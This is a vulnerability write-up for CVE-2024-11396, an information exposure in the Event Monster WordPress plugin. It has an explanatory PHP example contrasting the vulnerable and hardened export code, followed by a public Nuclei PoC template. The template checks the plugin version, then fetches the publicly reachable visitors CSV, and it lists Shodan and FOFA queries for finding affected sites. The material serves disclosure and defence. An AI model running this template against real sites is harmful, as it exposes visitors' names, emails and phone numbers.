The Event Monster Event Management, Tickets Booking, Upcoming Event plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 1.4.3 via the Visitors List Export file. During the export, a CSV file is created in the wp-content folder with a hardcoded filename that is publicly accessible. This makes it possible for unauthenticated attackers to extract data about event visitors, that includes first and last names, email, and phone number.
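The root cause described above is a common WordPress anti-pattern: a privileged export is written to a web-served directory under a fixed name, so the file is readable by anyone once it exists, regardless of who triggered the export. The following is an added, constructed example and not the Event Monster plugin's own code; the function names, the `em_demo_` hook prefix, the nonce action name and the sample rows are assumptions. It places the vulnerable pattern next to a hardened version that never writes the CSV under the web root and instead streams it only to a capability-checked, nonce-verified administrator.

```php
<?php
// Added, constructed example (not the Event Monster plugin's code).
// All names prefixed em_demo_ are assumptions for illustration only.

/**
 * VULNERABLE PATTERN: the export is written into the public uploads folder
 * under a fixed, predictable filename. The write may be triggered by an
 * admin, but the resulting file is served by the web server to anyone who
 * requests the path, so the visitor PII is exposed to unauthenticated clients.
 */
function em_demo_export_visitors_vulnerable( array $visitors ): string {
    $upload = wp_upload_dir();                            // .../wp-content/uploads
    $path   = $upload['basedir'] . '/visitors-list.csv';  // hardcoded name, public dir
    $fh     = fopen( $path, 'w' );
    fputcsv( $fh, array( 'First Name', 'Last Name', 'Email', 'Phone', 'Event' ) );
    foreach ( $visitors as $row ) {
        fputcsv( $fh, $row );
    }
    fclose( $fh );
    return $upload['baseurl'] . '/visitors-list.csv';     // URL handed to the admin page
}

/**
 * HARDENED PATTERN: require the capability and a nonce, then stream the CSV
 * straight to the authorised browser as a download. Nothing is persisted on
 * disk, so there is no file for an anonymous GET to find.
 */
function em_demo_export_visitors_hardened(): void {
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions', '', array( 'response' => 403 ) );
    }
    check_ajax_referer( 'em_demo_export_visitors', 'nonce' ); // dies on a bad nonce

    $visitors = em_demo_fetch_visitors(); // assumed data-access helper, defined below

    nocache_headers();
    header( 'Content-Type: text/csv; charset=utf-8' );
    header( 'Content-Disposition: attachment; filename="visitors-list.csv"' );

    $out = fopen( 'php://output', 'w' );
    fputcsv( $out, array( 'First Name', 'Last Name', 'Email', 'Phone', 'Event' ) );
    foreach ( $visitors as $row ) {
        fputcsv( $out, $row );
    }
    fclose( $out );
    exit;
}

/** Assumed helper: constructed sample rows standing in for a database query. */
function em_demo_fetch_visitors(): array {
    return array(
        array( 'Alice', 'Example', 'alice@example.com', '+1-555-0100', 'Demo Conf' ),
        array( 'Bob',   'Example', 'bob@example.com',   '+1-555-0101', 'Demo Conf' ),
    );
}

// Register the privileged endpoint only. Deliberately no wp_ajax_nopriv_ hook,
// so logged-out requests never reach the handler at all.
add_action( 'wp_ajax_em_demo_export_visitors', 'em_demo_export_visitors_hardened' );
```

Two design points matter here. First, the access check must sit on the act of reading the data, not on the act of producing the file: a file dropped in `wp-content/uploads` is served by the web server, which knows nothing about WordPress capabilities. Second, updating the plugin does not retroactively remove an export that was already written, so a site that ever used the export should also check for and delete a leftover `visitors-list.csv` in its uploads directory, and web-server access logs for that path are a straightforward place to look for prior anonymous reads.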
PoC code [public]
id: CVE-2024-11396

info:
  name: Event Monster <= 1.4.3 - Information Exposure Via Visitors List Export
  author: s4e-io
  severity: medium
  description: |
    The Event Monster Event Management, Tickets Booking, Upcoming Event plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 1.4.3 via the Visitors List Export file. During the export, a CSV file is created in the wp-content folder with a hardcoded filename that is publicly accessible. This makes it possible for unauthenticated attackers to extract data about event visitors, that includes first and last names, email, and phone number.
  reference:
    - https://github.com/RandomRobbieBF/CVE-2024-11396
    - https://plugins.trac.wordpress.org/browser/event-monster/tags/1.4.3/em-ajax-prossesing/em-visitor-ajax.php#L92
    - https://www.wordfence.com/threat-intel/vulnerabilities/id/0f522dfe-f2c2-4adb-980c-1f03d3c26e12?source=cve
    - https://nvd.nist.gov/vuln/detail/CVE-2024-11396
    - https://github.com/advisories/GHSA-6x4w-fvqp-6jvc
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2024-11396
    cwe-id: CWE-359
    epss-score: 0.41083
    epss-percentile: 0.97306
  metadata:
    verified: true
    max-request: 2
    vendor: a-wp-life
    product: event-monster
    framework: wordpress
    shodan-query: http.html:"wp-content/plugins/event-monster"
    fofa-query: body="wp-content/plugins/event-monster"
  tags: cve,cve2024,wordpress,wp,wp-plugin,event-monster,info-leak

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /wp-content/plugins/event-monster/readme.txt HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'compare_versions(version, "<= 1.4.3")'
          - 'contains(body, "event-monster")'
          - 'status_code == 200'
        condition: and
        internal: true

    extractors:
      - type: regex
        name: version
        part: body
        group: 1
        internal: true
        regex:
          - "(?mi)Stable tag: ([0-9.]+)"

  - raw:
      - |
        GET /wp-content/uploads/visitors-list.csv HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "First Name, Last Name, Email, Phone, Event")'
          - 'contains(content_type, "text/csv")'
          - 'status_code == 200'
        condition: and
# digest: 4a0a0047304502210087f02e21ade57176e5778aec415773821c7acae116b8810519108a5e17571767022005b8656bac3ef6ef20db1de13affb8fb4bf62bc5126a5009d43b2bf30374dcef:922c64590222798bb761d5b6d8e72950